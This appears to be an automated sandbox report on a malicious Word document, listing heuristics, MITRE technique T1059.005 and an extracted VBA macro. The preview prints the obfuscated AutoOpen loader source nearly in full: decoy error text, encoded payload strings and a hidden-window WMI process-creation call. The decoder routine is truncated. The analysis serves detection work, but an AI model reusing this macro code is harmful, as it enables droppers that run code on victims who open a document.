Verdict: MALICIOUS (Risk Score: 222)
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The file contains a heavily obfuscated VBA macro with an AutoOpen function, which is a common loader technique. The macro uses GetObject and potentially other execution methods to run arbitrary code, indicated by the 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens' heuristics. The script attempts to decrypt and execute a payload, likely involving a second-stage download, but the exact URL or command is obfuscated. The presence of GetObject and the overall structure suggest a downloader or dropper.
Heuristics 7
- VBA macros detected (medium; 4 related findings). OLE_VBA_MACROS: Document contains VBA macro code.
- Obfuscated auto-exec VBA loader (critical). OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high). OLE_VBA_AUTOOPEN: AutoOpen macro.
- GetObject call (high). OLE_VBA_GETOBJ: GetObject call.
- VBA p-code auto-exec with execution tokens (high). OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium). OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info). EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following were found in document text (OLE body):
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/photoshop/1.0/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4505 bytes | f44803d0129098abbf4ce06c96d26c2408893b96258a18d25e8aa74d5d4fe57a |
Preview script: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
' Auto-exec entry point: Word runs AutoOpen when the document is opened
Sub AutoOpen()
Dim JCkxoRBPynMExQ As String
Dim gsRJcVnw As Object
Dim iztHUFEfusHPmmlWcqiCfcac As Integer
Dim dzBMNIYcZgZdyZI As String
Dim KWevsQeOpnmAPmRl As String
Dim rngFirstParagraph As Range
Dim sID As String
' Overwrites the first paragraph with decoy "Decryption failed" text so the user sees a plausible error
Set rngFirstParagraph = ActiveDocument.Paragraphs(1).Range
With rngFirstParagraph
.Delete
.InsertAfter Text:="Decryption failed" & Chr(10)
.InsertAfter Text:="ErrCode:0x05" & Chr(10)
.InsertParagraphAfter
With .Font
.Name = "Century"
.Size = 12
End With
End With
' 9716 is only a gate value; JpeNvwoLgvTSxK requires it to exceed 6 before reaching the execution branch
iztHUFEfusHPmmlWcqiCfcac = 9716
' qvtIi returns a decoded object moniker (its argument is ignored); GetObject binds to it
KWevsQeOpnmAPmRl = qvtIi("IHLAwWqOqoH")
Set gsRJcVnw = GetObject(KWevsQeOpnmAPmRl)
' lzWLxBExN returns the decoded payload string, which JpeNvwoLgvTSxK hands to the bound object's Create method
dzBMNIYcZgZdyZI = lzWLxBExN("IHLAwWqOqoH")
dzBMNIYcZgZdyZI = JpeNvwoLgvTSxK(gsRJcVnw, dzBMNIYcZgZdyZI, iztHUFEfusHPmmlWcqiCfcac)
End Sub
' Concatenates five encoded chunks into one blob and runs it through the YdoQa decoder; the argument is unused
Function lzWLxBExN(qFIlBjXodohTRCfHDRST As String) As String
Dim MOZdAWNIwbLzgfJWlu As String
Dim HraTLBiqV As String
Dim jsBVeahIKWU As String
jsBVeahIKWU = "vu}kxynkrr4k~k&3tuv&3}&nojjkt&3kti&PGH7GNOGhGG?GIOGgGH6GNWGiGH GJuGR}G|GNiGj}H9GI:GgmHnGMWGhGGzGM>GimG{GMSGh}HzGI>Gj}HrGMOGjWHvGI:G_}H|GM:G`mGoGJyGQGHUGM[Gj}GzGK>G_mHwGM[G_}H6GIGG[}H;GNSGjGHrGM6GRmHUG"
Dim OajBM As String
OajBM = "M[GjGG{GLiG`WHoGKSGhGHvGM[GhmH6GIqGRmHKGM>Gj}H{GM}Gh}HnGMWGXmHvGM}G`WGuGIWGjWH GM}GRGGqGM[GhmH8GJuG\GHrGM6GiGGxGIiG^GHJGM>GhWH}GN[GjGHrGNOGRmH8GMOGi}GtGIqGU}GqGNSGjGHnGNOGjGH\GNGGXmH|GM}G`GHrGNOGOGG?G"
Dim qxHCvXFxjlcacDy As String
qxHCvXFxjlcacDy = "IGGOmGqGK[GhmH8GJuGWWHWGLGGXGHHGLWGWWHiGK6GgWHpGNOGh}H GM>G`mH6GL}G\}HvGM:G`GH|GNiGi}HiGLSGjGHnGNOGjGGmGK6G`WH{GN[G^GHWGNOGh}HtGNOG_WHzGNSG^GHZGNWG_WH GNWGjWH}GIOGU}GqGNWG`WHzGNGGVWGoGIWGXWH{GN_GUmH6G"
Dim kFhIJ As String
kFhIJ = "M[GhWH}GL}GW}H|GM6GiGH7GNWG`WH GI:GjmHoGNSGOmG=GMSGi}HpGNOGgWH}GNWGOGGqGNWG`WHzGNGGU}HJGM>GiGH;GI6GYWH6GM[GhWGmGIWGjGHrGM6GiGGmGIWGi}H6GMKGimH6GL[GiGHMGM>GhGHqGM[GimG=GLOG`WHzGM>GjmHrGI6GYWH6GM[GhWGmG"
Dim MRrpF As String
MRrpF = "IWGjGHrGM6GiGG=GGCC"
MOZdAWNIwbLzgfJWlu = jsBVeahIKWU & OajBM & qxHCvXFxjlcacDy & kFhIJ & MRrpF
MOZdAWNIwbLzgfJWlu = YdoQa(MOZdAWNIwbLzgfJWlu)
lzWLxBExN = MOZdAWNIwbLzgfJWlu
End Function
Function ZMxwQzU() As String
Dim PloKBTmiiWQIpTTTLk As String
PloKBTmiiWQIpTTTLk = YdoQa("}otsmszy@xuuz5ios|8")
ZMxwQzU = PloKBTmiiWQIpTTTLk
End Function
Function JpeNvwoLgvTSxK(gJyAaTKda As Object, LYrDQtTPFRlS As String, shnIviWG As Integer) As String
Dim mBeuYtzxKFJZdSQvxWdHosh As String
Dim XetxVOaoktUrHUgMmMDYpku As Integer
Dim YLNZqCoH As Integer
Dim ulWhTLJ As Integer
XetxVOaoktUrHUgMmMDYpku = 6
mBeuYtzxKFJZdSQvxWdHosh = LYrDQtTPFRlS
If (shnIviWG > XetxVOaoktUrHUgMmMDYpku) Then
' Second GetObject followed by .Get(...) and .SpawnInstance_ is the WMI (SWbemObject) pattern for building a startup-configuration instance
Set KzvmfJNmAskYGYTvumBkTV = GetObject(ZMxwQzU())
Set RYNGHXPC = KzvmfJNmAskYGYTvumBkTV.Get(YdoQa("]ot98eVxuikyyYzgxz{v"))
Set lRqRoVGNdqgKwBayUgKuAKk = RYNGHXPC.SpawnInstance_
' The window-state value (12) is produced arithmetically instead of appearing as a literal constant
XetxVOaoktUrHUgMmMDYpku = shnIviWG - shnIviWG
XetxVOaoktUrHUgMmMDYpku = XetxVOaoktUrHUgMmMDYpku + 12
lRqRoVGNdqgKwBayUgKuAKk.ShowWindow = XetxVOaoktUrHUgMmMDYpku
' Execution sink: the four-argument Create call on the object bound in AutoOpen, with the decoded string as its first argument
ulWhTLJ = gJyAaTKda.Create(mBeuYtzxKFJZdSQvxWdHosh, Null, lRqRoVGNdqgKwBayUgKuAKk, YLNZqCoH)
End If
mBeuYtzxKFJZdSQvxWdHosh = "sIxvKuspx"
JpeNvwoLgvTSxK = mBeuYtzxKFJZdSQvxWdHosh
End Function
Function qvtIi(ttYImzolfjXPQ As String) As String
Dim UCJVWDU As String
UCJVWDU = YdoQa("}otsmszy@]ot98eVxuikyy")
qvtIi = UCJVWDU
End Function
' Shared string decoder used by every routine above; its body is cut off in this extraction
Function YdoQa(dzLwQuGAOBlnQ As String) As String
Dim SPolvBuDKMPTKDs As Long
Dim mXuOsnwWjVrqSp As String
Dim MWCzHkgMsGNFqetTefS As Integer
Dim int1 As Integer
MWCzH
... (truncated)